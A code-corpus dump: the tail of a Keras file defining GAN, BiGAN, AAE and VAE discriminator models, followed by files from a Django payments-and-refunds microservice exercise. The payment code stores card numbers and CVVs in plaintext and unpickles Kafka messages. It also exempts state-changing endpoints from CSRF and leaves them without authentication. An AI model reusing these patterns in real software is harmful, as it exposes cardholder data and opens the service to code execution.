x = Conv2D(64, (4,4), strides=(2,2))(x)
x = ConvMaxout(n_piece=2)(x)
x = Dropout(0.5)(x)
x = Conv2D(128, (4,4), strides=(1,1))(x)
x = ConvMaxout(n_piece=2)(x)
x = Dropout(0.5)(x)
x = Conv2D(256, (4,4), strides=(2,2))(x)
x = ConvMaxout(n_piece=2)(x)
x = Dropout(0.5)(x)
x = Conv2D(512, (4,4), strides=(1,1))(x)
x = ConvMaxout(n_piece=2)(x)
concatenated = Concatenate(axis=-1)([z, x])
c = Dropout(0.5)(concatenated)
c = Conv2D(1024, (1,1), strides=(1,1))(c)
c = ConvMaxout(n_piece=2)(c)
c = Dropout(0.5)(c)
c = Conv2D(1024, (1,1), strides=(1,1))(c)
c = ConvMaxout(n_piece=2)(c)
c = Dropout(0.5)(c)
c = Conv2D(1, (1,1), strides=(1,1), activation='sigmoid')(c)
validity = Flatten()(c)
return Model([z_in, x_in], validity)
def gan_discriminator_model():
x_in = Input(shape=img_shape)
x = Dropout(0.2)(x_in)
x = Conv2D(32, (5,5), strides=(1,1))(x)
x = ConvMaxout(n_piece=2)(x)
x = Dropout(0.5)(x)
x = Conv2D(64, (4,4), strides=(2,2))(x)
x = ConvMaxout(n_piece=2)(x)
x = Dropout(0.5)(x)
x = Conv2D(128, (4,4), strides=(1,1))(x)
x = ConvMaxout(n_piece=2)(x)
x = Dropout(0.5)(x)
x = Conv2D(256, (4,4), strides=(2,2))(x)
x = ConvMaxout(n_piece=2)(x)
x = Dropout(0.5)(x)
x = Conv2D(512, (4,4), strides=(1,1))(x)
x = ConvMaxout(n_piece=2)(x)
c = Dropout(0.5)(x)
c = Conv2D(1024, (1,1), strides=(1,1))(c)
c = ConvMaxout(n_piece=2)(c)
c = Dropout(0.5)(c)
c = Conv2D(1024, (1,1), strides=(1,1))(c)
c = ConvMaxout(n_piece=2)(c)
c = Dropout(0.5)(c)
c = Conv2D(1, (1,1), strides=(1,1), activation='sigmoid')(c)
validity = Flatten()(c)
return Model(x_in, validity)
def ce_discriminator_model():
x_in = Input(shape=mask_shape)
x = Dropout(0.2)(x_in)
print(x.shape)
x = Conv2D(32, (4,4), strides=(1,1))(x)
print(x.shape)
x = ConvMaxout(n_piece=2)(x)
x = Dropout(0.5)(x)
x = Conv2D(64, (3,3), strides=(1,1))(x)
print(x.shape)
x = ConvMaxout(n_piece=2)(x)
x = Dropout(0.5)(x)
x = Conv2D(128, (3,3), strides=(1,1))(x)
print(x.shape)
x = ConvMaxout(n_piece=2)(x)
x = Dropout(0.5)(x)
x = Conv2D(256, (2,2), strides=(1,1))(x)
print(x.shape)
x = ConvMaxout(n_piece=2)(x)
x = Dropout(0.5)(x)
x = Conv2D(512, (2,2), strides=(1,1))(x)
print(x.shape)
x = ConvMaxout(n_piece=2)(x)
c = Dropout(0.5)(x)
c = Conv2D(1024, (1,1), strides=(1,1))(c)
print(c.shape)
c = ConvMaxout(n_piece=2)(c)
c = Dropout(0.5)(c)
c = Conv2D(1024, (1,1), strides=(1,1))(c)
print(c.shape)
c = ConvMaxout(n_piece=2)(c)
c = Dropout(0.5)(c)
c = Conv2D(1, (1,1), strides=(1,1), activation='sigmoid')(c)
print(c.shape)
validity = Flatten()(c)
print(validity.shape)
return Model(x_in, validity)
def aae_discriminator_model():
z_in = Input(shape=(latent_dim,))
z = Reshape((1, 1, latent_dim))(z_in)
z = Dropout(0.2)(z)
z = Conv2D(512, (1, 1), strides=(1, 1))(z)
z = ConvMaxout(n_piece=2)(z)
z = Dropout(0.5)(z)
z = Conv2D(512, (1, 1), strides=(1, 1))(z)
z = ConvMaxout(n_piece=2)(z)
c = Dropout(0.5)(z)
c = Conv2D(1024, (1, 1), strides=(1, 1))(c)
c = ConvMaxout(n_piece=2)(c)
c = Dropout(0.5)(c)
c = Conv2D(1024, (1, 1), strides=(1, 1))(c)
c = ConvMaxout(n_piece=2)(c)
c = Dropout(0.5)(c)
c = Conv2D(1, (1, 1), strides=(1, 1), activation='sigmoid')(c)
validity = Flatten()(c)
return Model(z_in, validity)
def bigan_model(generator, encoder, discriminator):
z = Input(shape=(latent_dim,))
x = Input(shape=img_shape)
x_ = generator(z)
z_ = encoder(x)
fake = discriminator([z, x_])
valid = discriminator([z_, x])
return Model([z, x], [fake, valid])
def gan_model(generator, discriminator):
model = Sequential()
model.add(generator)
model.add(discriminator)
return model
def autoencoder_model(encoder, decoder):
model = Sequential()
model.add(encoder)
model.add(decoder)
return model
def aae_model(encoder, decoder, discriminator):
x = Input(shape=img_shape)
enc_x = encoder(x)
recon_x = decoder(enc_x)
validity = discriminator(enc_x)
return Model(x, [recon_x, validity])
def latent_reconstructor_model(d, e):
model = Sequential()
model.add(d)
model.add(e)
return model
def sampling():
z_mean = Input(shape=(latent_dim,))
z_log_var = Input(shape=(latent_dim,))
epsilon = K.random_normal(shape=(K.shape(z_mean)[0], latent_dim),
mean=0., stddev=1.0)
z = z_mean + K.exp(z_log_var / 2) * epsilon
return Model([z_mean, z_log_var], z)
def vae_model(encoder, generator):
x = Input(shape=img_shape)
z_mean, z_log_var = encoder(x)
z = sampling([z_mean, z_log_var])
recon_x = generator(z)
return Model(x, recon_x) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,522 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /payments_app/payments/urls.py | from django.urls import path
from . import views
app_name = 'payments'
urlpatterns = [
# /payments/
path('', views.listAllPayments, name='allPayments'),
path('payment/<payment_id>/', views.showPayment, name='showPayment'),
path('newPayment/', views.newPayment, name='newPayment'),
path('deletePayment/<payment_id>/', views.deletePayment, name='deletePayment'),
path('settlePayment/<payment_id>/', views.settlePayment, name='settlePayment'),
path('filterPayments/', views.filterPayments, name='filterPayments'),
# Views that render a GUI
path('allPayments/', views.listAllPaymentsGUI, name='allPaymentsGUI'),
path('paymentGUI/<payment_id>/', views.showPaymentGUI, name='showPaymentGUI'),
path('newPaymentGUI/', views.newPaymentGUI, name='newPaymentGUI'),
path('processPayment/', views.processPayment, name='processPayment'),
path('deletePaymentGUI/<payment_id>/', views.deletePaymentGUI, name='deletePaymentGUI'),
path('settlePaymentGUI/<payment_id>/', views.settlePaymentGUI, name='settlePaymentGUI'),
path('filterPaymentGUI/', views.filterPaymentsGUI, name='filterPaymentsGUI'),
] | {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,523 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /payments_app/payments/views.py | from django.forms.models import model_to_dict
from django.http.request import HttpRequest
from django.http.response import HttpResponse, HttpResponseBadRequest, HttpResponseNotFound, JsonResponse
from django.shortcuts import get_object_or_404, redirect, render
from .models import Base, CreditCard, MbWay, BaseForm, CreditCardForm, MbWayForm
from kafka import KafkaProducer
import pickle
from django.views.decorators.csrf import csrf_exempt
import datetime
# Refunds microservice url (only used in GUI version to redirect to newRefund page)
refunds_url = 'http://172.26.1.2:2222/api/refunds/'
# Kafka URL
kafka_server = 'kafka:9092'
def kafkaProd(topic, key, data):
producer = KafkaProducer(bootstrap_servers=kafka_server)
serialized_data = pickle.dumps({'data': data}, pickle.HIGHEST_PROTOCOL)
try:
producer.send(topic, key=bytes(key,'utf-8'), value=serialized_data)
producer.flush()
return True
except AssertionError:
return False
#
# Auxiliar functions
#
def is_date(str):
try:
datetime.datetime.strptime(str, '%Y-%m-%d %H:%M')
return True
except ValueError:
return False
def findPayment(payment_id):
payment = get_object_or_404(Base, payment_id=payment_id)
# credit_card
if payment.payment_method == Base.CC:
full_payment = CreditCard.objects.get(payment_id=payment_id)
# MBWay
else:
full_payment = MbWay.objects.get(payment_id=payment_id)
return payment, full_payment
def is_valid_queryparam(param):
return param != '' and param is not None
def filter(request):
payments = Base.objects.all()
payment_id = request.GET.get('payment_id')
min_amount = request.GET.get('min_amount')
max_amount = request.GET.get('max_amount')
payment_method = request.GET.get('payment_method')
status = request.GET.get('status')
min_created_at = request.GET.get('min_created_at')
max_created_at = request.GET.get('max_created_at')
min_settled_at = request.GET.get('min_settled_at')
max_settled_at = request.GET.get('max_settled_at')
if is_valid_queryparam(payment_id) and payment_id != "Choose...":
payments = payments.filter(payment_id=payment_id)
if is_valid_queryparam(min_amount):
payments = payments.filter(amount__gte=min_amount)
if is_valid_queryparam(max_amount):
payments = payments.filter(amount__lte=max_amount)
if is_valid_queryparam(payment_method) and payment_method != "Choose...":
payments = payments.filter(payment_method=payment_method)
if is_valid_queryparam(status) and status != "Choose...":
payments = payments.filter(status=status)
if is_valid_queryparam(min_created_at):
payments = payments.filter(created_at__gte=min_created_at)
if is_valid_queryparam(max_created_at):
payments = payments.filter(created_at__lt=max_created_at)
if is_valid_queryparam(min_settled_at):
payments = payments.filter(settled_at__gte=min_settled_at)
if is_valid_queryparam(max_settled_at):
payments = payments.filter(settled_at__lt=max_settled_at)
return payments
def settlePayment_aux(payment_id):
payment = get_object_or_404(Base, payment_id=payment_id)
amount = payment.amount
payment.settled_amount = amount
payment.settled_at = datetime.datetime.now()
payment.status = Base.SETTLED
payment.save()
#
# Views that return Responses
#
def listAllPayments(request):
allPayments = []
for p in Base.objects.all():
refundDict = model_to_dict(p)
refundDict['created_at'] = p.created_at
allPayments.append(refundDict)
return JsonResponse({'payments': allPayments}, status=200)
def showPayment(request, payment_id):
payment, fullPayment = findPayment(payment_id)
if payment == None:
return HttpResponseNotFound('Payment not found')
paymentDict = model_to_dict(payment)
paymentDict['created_at'] = payment.created_at
paymentDict['additional_parameters'] = model_to_dict(fullPayment)
return JsonResponse({'base': paymentDict}, status=200)
def filterPayments(request):
payments = [model_to_dict(p) for p in filter(request)]
return JsonResponse({'filteredPayments': payments}, status=200)
@csrf_exempt
def newPayment(request):
if request.method == 'POST':
payment = Base()
payment.amount = request.POST.get('amount')
payment.payment_method = request.POST.get('payment_method')
if 'settled_at' in request.POST:
settled_at = request.POST.get('settled_at')
if not is_date(settled_at):
return HttpResponseBadRequest('"settled_at must have a format YYYY-MM-DD HH:MM"')
else:
payment.settled_at = request.POST.get('settled_at')
payment.settled_amount = request.POST.get('settled_amount')
payment.status = Base.SUCCESS
if payment.settled_amount == payment.amount:
payment.status = Base.SETTLED
if payment.payment_method == Base.CC:
cc = CreditCard()
cc.payment_id = payment
cc.number = request.POST.get('number')
cc.name = request.POST.get('name')
cc.expiration_month = request.POST.get('expiration_month')
cc.expiration_year = request.POST.get('expiration_year')
cc.cvv = request.POST.get('cvv')
payment.save()
cc.save()
elif payment.payment_method == Base.MBWay:
mbway = MbWay()
mbway.payment_id = payment
mbway.phone_number = request.POST.get('phone_number')
payment.save()
mbway.save()
else:
payment.status = Base.ERROR
payment.save()
return HttpResponseBadRequest('Bad payment method')
paymentDict = model_to_dict(payment)
paymentDict['created_at'] = payment.created_at
if kafkaProd(topic='payment', key=str(payment.payment_id), data=paymentDict):
return HttpResponse('New payment created.',status=200)
else:
payment.delete()
return HttpResponse('Payment could not be published to topic.', status=503)
return HttpResponseBadRequest("Data not found.")
def settlePayment(request, payment_id):
settlePayment_aux(payment_id)
return HttpResponse('Payment settled.', status=200)
def deletePayment(request, payment_id):
get_object_or_404(Base, payment_id=payment_id).delete()
return HttpResponse('Payment ' + payment_id + ' deleted.', status=200)
#
# Views that render a GUI
#
def listAllPaymentsGUI(request):
allPayments = Base.objects.all()
return render(request, 'payments/allPayments.html', {'allPayments': allPayments})
def showPaymentGUI(request, payment_id):
payment, full_payment = findPayment(payment_id)
context = {
'payment_id': payment_id,
'payment': full_payment,
'notSettled': payment.amount!=payment.settled_amount,
'refunds_url': refunds_url
}
return render(request, 'payments/showPayment.html', context)
def filterPaymentsGUI(request):
return render(request, 'payments/filterPayments.html', {'payments': filter(request), 'payment_ids': list(Base.objects.all().values_list('payment_id', flat=True)), 'status': Base.statusOP, 'pay_method': Base.pay_method})
def newPaymentGUI(request):
form = BaseForm(request.POST or None)
payment_id = form['payment_id'].value()
if form.is_valid():
form.save()
request.session['payment_id'] = payment_id
request.session['payment_method'] = form['payment_method'].value()
return redirect('payments:processPayment')
return render(request, 'payments/createPayment.html', {'form': form})
def processPayment(request):
payment_method = request.session['payment_method']
payment_id = request.session['payment_id']
basePayment = get_object_or_404(Base, payment_id=payment_id)
# Only one payment method can be associated with a payment
if not CreditCard.objects.filter(payment_id=payment_id) and not MbWay.objects.filter(payment_id=payment_id):
if payment_method == Base.CC:
form = CreditCardForm(request.POST or None, initial={'payment_id': payment_id})
else:
form = MbWayForm(request.POST or None, initial={'payment_id': payment_id})
if form.is_valid():
form.save()
if float(basePayment.amount) == float(basePayment.settled_amount):
basePayment.status = Base.SETTLED
else:
basePayment.status = Base.SUCCESS
basePayment.save()
paymentDict = model_to_dict(basePayment)
paymentDict['created_at'] = basePayment.created_at
kafkaProd(topic='payment', key=payment_id, data=paymentDict)
return redirect('payments:allPaymentsGUI')
return render(request, 'payments/processPayment.html', {'form': form, 'payment_method': payment_method})
return HttpResponse("Only one payment method can be associated to a payment.")
def settlePaymentGUI(request, payment_id):
settlePayment_aux(payment_id)
return redirect('payments:showPaymentGUI', payment_id)
def deletePaymentGUI(request, payment_id):
get_object_or_404(Base, payment_id=payment_id).delete()
return redirect('payments:allPaymentsGUI') | {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,524 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /payments_app/payments/migrations/0003_creditcard_mbway.py | # Generated by Django 2.2.12 on 2021-09-14 14:10
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('payments', '0002_auto_20210914_1405'),
]
operations = [
migrations.CreateModel(
name='MbWay',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone_number', models.CharField(max_length=9)),
('payment_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='payments.Base')),
],
),
migrations.CreateModel(
name='CreditCard',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('number', models.CharField(max_length=16)),
('name', models.CharField(max_length=30)),
('expiration_month', models.CharField(max_length=2)),
('expiration_year', models.CharField(max_length=4)),
('cvv', models.CharField(max_length=3)),
('payment_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='payments.Base')),
],
),
]
| {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,525 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /payments_app/payments/migrations/0001_initial.py | # Generated by Django 2.2.12 on 2021-09-14 11:36
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Base',
fields=[
('payment_id', models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False)),
('amount', models.FloatField()),
('payment_method', models.CharField(choices=[('cc', 'credit_card'), ('mb', 'mbway')], max_length=50)),
('created_at', models.DateTimeField(auto_now_add=True)),
('status', models.CharField(choices=[('s', 'success'), ('e', 'error'), ('st', 'settled')], max_length=20)),
('settled_at', models.DateTimeField(null=True)),
('settled_amount', models.FloatField(null=True)),
],
),
migrations.CreateModel(
name='MbWay',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone_number', models.CharField(max_length=9)),
('payment_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='payments.Base')),
],
),
migrations.CreateModel(
name='CreditCard',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('number', models.CharField(max_length=16)),
('name', models.CharField(max_length=30)),
('expiration_month', models.CharField(max_length=2)),
('expiration_year', models.CharField(max_length=4)),
('cvv', models.CharField(max_length=3)),
('payment_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='payments.Base')),
],
),
]
| {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,526 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /refunds_app/refunds/urls.py | from django.urls import path
from . import views
app_name = 'refunds'
urlpatterns = [
# /refunds/
path('', views.listAllRefunds, name='allRefunds'),
path('setRefundTimeout/', views.setRefundTimeout, name='setRefundTimeout'),
path('refund/<refund_id>/', views.showRefund, name='showRefund'),
path('newRefund/<payment_id>', views.newRefund, name='newRefund'),
path('filterRefunds/', views.filterRefunds, name='filterRefunds'),
# Views that render a GUI
path('allRefunds/', views.listAllRefundsGUI, name='allRefundsGUI'),
path('refundGUI/<refund_id>/', views.showRefundGUI, name='showRefundGUI'),
path('newRefundGUI/<payment_id>', views.newRefundGUI, name='newRefundGUI'),
path('filterRefundsGUI/', views.filterRefundsGUI, name='filterRefundsGUI'),
] | {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,527 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /refunds_app/refunds/views.py | from django.contrib import messages
from django.forms.models import model_to_dict
from django.http.response import HttpResponse, HttpResponseBadRequest, HttpResponseNotAllowed, HttpResponseServerError, JsonResponse
from django.shortcuts import get_object_or_404, redirect, render
from django.views.decorators.csrf import csrf_exempt
from .models import Refund, RefundForm
from kafka import KafkaConsumer
import pickle
import datetime
# Payments microservice URL (only used in GUI version to redirect to showPayment page)
payments_url = 'http://172.26.1.1:1111/api/payments/'
# Kafka URL
kafka_server = 'kafka:9092'
# global variable
# Refunds can only be commited after refundTimeout minutes after receiving the request
refundTimeout = 30
def kafkaCon(topic, key):
consumer = KafkaConsumer(topic, bootstrap_servers=[kafka_server], auto_offset_reset='earliest')
for message in consumer:
if message.key.decode('UTF-8') == key:
return pickle.loads(message.value)['data']
return None
#
# Auxiliar functions
#
def is_valid_queryparam(param):
return param != '' and param is not None
def getTotalAmount(payment_id):
refunds = Refund.objects.filter(payment_id=payment_id)
amount = 0
for refund in refunds:
amount += refund.amount
return amount
def refundTimePassed(initial_date):
global refundTimeout
date_now = datetime.datetime.now()
delta = datetime.timedelta(minutes=refundTimeout)
return date_now-delta > initial_date
def filter(request):
refunds = Refund.objects.all()
refund_id = request.GET.get('refund_id')
payment_id = request.GET.get('payment_id')
if is_valid_queryparam(refund_id) and refund_id != "Choose...":
refunds = refunds.filter(refund_id=refund_id)
if is_valid_queryparam(payment_id) and payment_id != "Choose...":
refunds = refunds.filter(payment_id=payment_id)
return refunds
def paymentToString(payment):
return 'Payment ID: ' + str(payment['payment_id']) + ", Amount: " + str(payment['amount']) + "€, Method: " + payment['payment_method'] + ", Status: " + payment['status'] + ", Created at: " + payment['created_at'].strftime("%Y-%m-%d %H:%M:%S") + "\n"
#
# Views that return Responses
#
def listAllRefunds(request):
allRefunds = []
for r in Refund.objects.all():
refundDict = model_to_dict(r)
refundDict['created_at'] = r.created_at
allRefunds.append(refundDict)
return JsonResponse({'refunds': allRefunds}, status=200)
@csrf_exempt
def setRefundTimeout(request):
global refundTimeout
t = request.POST.get('timeout')
if is_valid_queryparam(t):
refundTimeout = int(t)
return HttpResponse('Refund timeout successfully set to ' + str(refundTimeout), status=200)
return HttpResponseBadRequest('Invalid parameter input')
@csrf_exempt
def newRefund(request, payment_id):
global refundTimeout
start_date = datetime.datetime.now()
refundAmount = float(request.POST.get('refund_amount'))
payment = kafkaCon(topic='payment', key=payment_id)
if payment != None:
totalPaid = getTotalAmount(payment_id)
remaining_amount = float(payment['amount'])-totalPaid
if remaining_amount > 0:
if refundTimePassed(start_date):
return HttpResponseServerError('Could not process refund on time.')
else:
refundAmount = float(request.POST.get('refund_amount'))
if refundAmount > remaining_amount:
return HttpResponseBadRequest('Refund amount must be less than or equal to ' + float(remaining_amount))
else:
refund = Refund()
refund.payment_id = payment_id
refund.amount = refundAmount
refund.save()
return HttpResponse('New refund created.', status=200)
else:
return HttpResponseNotAllowed('Payment with ID ' + str(payment_id) + " has been fully refunded already.")
def showRefund(request, refund_id):
refund = get_object_or_404(Refund, refund_id=refund_id)
payment = kafkaCon(topic='payment', key=refund.payment_id)
if payment != None:
refundDict = model_to_dict(refund)
refundDict['created_at'] = refund.created_at
return JsonResponse({'refund': refundDict, 'payment': payment}, status=200)
return HttpResponseServerError("Could not access payments service!")
def filterRefunds(request):
refunds= [model_to_dict(r) for r in filter(request)]
return JsonResponse({'filteredRefunds': refunds}, status=200)
#
# Views that render a GUI
#
def listAllRefundsGUI(request):
global refundTimeout
allRefunds = Refund.objects.all()
t = request.GET.get('timeout')
if is_valid_queryparam(t):
refundTimeout = t
return render(request, 'refunds/allRefunds.html', {'allRefunds': allRefunds, 'payments_url': payments_url, 'refundTimeout': refundTimeout})
def newRefundGUI(request, payment_id):
global refundTimeout
start_date = datetime.datetime.now()
payment = kafkaCon(topic='payment', key=payment_id)
if payment != None:
totalPaid = getTotalAmount(payment_id)
remaining_amount = float(payment['amount'])-totalPaid
if remaining_amount > 0:
form = RefundForm(request.POST or None)
if form.is_valid() and not refundTimePassed(start_date):
if float(form['amount'].value()) > remaining_amount:
messages.info(request, 'Cannot create a new refund with that amount. Max amount is: ' + str(remaining_amount))
return render(request, 'refunds/createRefund.html', {'form': form, 'payment_id': payment_id, 'remaining_amount': remaining_amount})
form.save()
return redirect(payments_url+'paymentGUI/'+payment_id)
return render(request, 'refunds/createRefund.html', {'form': form, 'payment_id': payment_id, 'remaining_amount': remaining_amount})
else:
return HttpResponseNotAllowed('Payment with ID ' + str(payment_id) + " has been fully refunded already.")
def filterRefundsGUI(request):
all_refund_ids = list(Refund.objects.all().values_list('refund_id', flat=True))
all_payment_ids = list(Refund.objects.all().values_list('payment_id', flat=True).distinct())
return render(request, 'refunds/filterRefunds.html', {'refunds': filter(request), 'refund_ids': all_refund_ids, 'payment_ids': all_payment_ids})
def showRefundGUI(request, refund_id):
refund = get_object_or_404(Refund, refund_id=refund_id)
payment = kafkaCon(topic='payment', key=refund.payment_id)
if payment != None:
return render(request, 'refunds/showRefund.html', {'refund_id': refund_id, 'refund': refund, 'payment': paymentToString(payment)})
return HttpResponseServerError("Could not access payments service!") | {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,528 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /refunds_app/refunds/migrations/0001_initial.py | # Generated by Django 2.2.12 on 2021-09-15 15:46
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Refund',
fields=[
('refund_id', models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False)),
('payment_id', models.CharField(max_length=200)),
('created_at', models.DateTimeField(auto_now_add=True)),
('amount', models.FloatField()),
],
),
]
| {"/payments_app/payments/views.py": ["/payments_app/payments/models.py"], "/refunds_app/refunds/views.py": ["/refunds_app/refunds/models.py"], "/refunds_app/refunds/admin.py": ["/refunds_app/refunds/models.py"], "/payments_app/payments/admin.py": ["/payments_app/payments/models.py"]} |
53,529 | MSilva98/technical_challenge_SWITCH | refs/heads/master | /payments_app/payments/models.py | from django import forms
from django.db import models
from django.forms import ModelForm
import uuid
class Base(models.Model):
CC = "credit_card"
MBWay = "mbway"
SUCCESS = "success"
ERROR = "error"
SETTLED = "settled"
pay_method = (
(CC, 'credit_card'),
(MBWay, 'mbway')
)
statusOP = (
(SUCCESS, 'success'),
(ERROR, 'error'),
(SETTLED, 'settled')
)
payment_id = models.UUIDField(max_length=200, primary_key=True, default=uuid.uuid4) # primary key, auto generated UUID
amount = models.FloatField()
payment_method = models.CharField(max_length=50, default=CC, choices=pay_method)
created_at = models.DateTimeField(auto_now_add=True)
status = models.CharField(max_length=20, choices=statusOP)
settled_at = models.DateTimeField(null=True, blank=True)
settled_amount = models.FloatField(null=True, blank=True, default=0)
def __str__(self):
baseStr = "Payment ID: " + str(self.payment_id) + ", Amount: " + str(self.amount) + "€, Method: " + self.payment_method + ", Created at: " + str(self.created_at) + ", Status: " + self.status
if self.settled_at != None:
return baseStr + ", Settled at: " + str(self.settled_at) + ", Settled amount: " + str(self.settled_amount) + "€"
else:
return baseStr
class CreditCard(models.Model):
payment_id = models.OneToOneField(Base, on_delete=models.CASCADE) # Foreign key to Base
number = models.CharField(max_length=16)
name = models.CharField(max_length=30)
expiration_month = models.CharField(max_length=2)
expiration_year = models.CharField(max_length=4)
cvv = models.CharField(max_length=3)
def __str__(self):
return str(self.payment_id) + ", Card Number: " + self.number + ", Name: " + self.name + ", Exp. Month: " + self.expiration_month + ", Exp. Year: " + self.expiration_year + ", CVV: " + self.cvv + "\n"
class MbWay(models.Model):
payment_id = models.OneToOneField(Base, on_delete=models.CASCADE) # Foreign key to base
phone_number = models.CharField(max_length=9)
def __str__(self):
return str(self.payment_id) + ", Phone Number: " + self.phone_number + "\n"
class BaseForm(ModelForm):
class Meta:
model = Base
fields = ('payment_id', 'amount', 'payment_method', 'status', 'settled_at', 'settled_amount')
widgets = {
'payment_id': forms.TextInput(attrs={'readonly': 'readonly', 'class': 'form-control'}),
'amount': forms.NumberInput(attrs={'class': 'form-control', 'min': 0}),
'payment_method': forms.Select(attrs={'class': 'form-control'}, choices=Base.pay_method),
'settled_at': forms.DateTimeInput(attrs={'class': 'form-control', 'type': 'date'}),
'settled_amount': forms.NumberInput(attrs={'class': 'form-control', 'min': 0, 'default': 0}),
'status': forms.HiddenInput(attrs={'class': 'form-control', 'default': Base.ERROR}),
}
class CreditCardForm(ModelForm):
class Meta:
model = CreditCard
fields = '__all__'
widgets = {
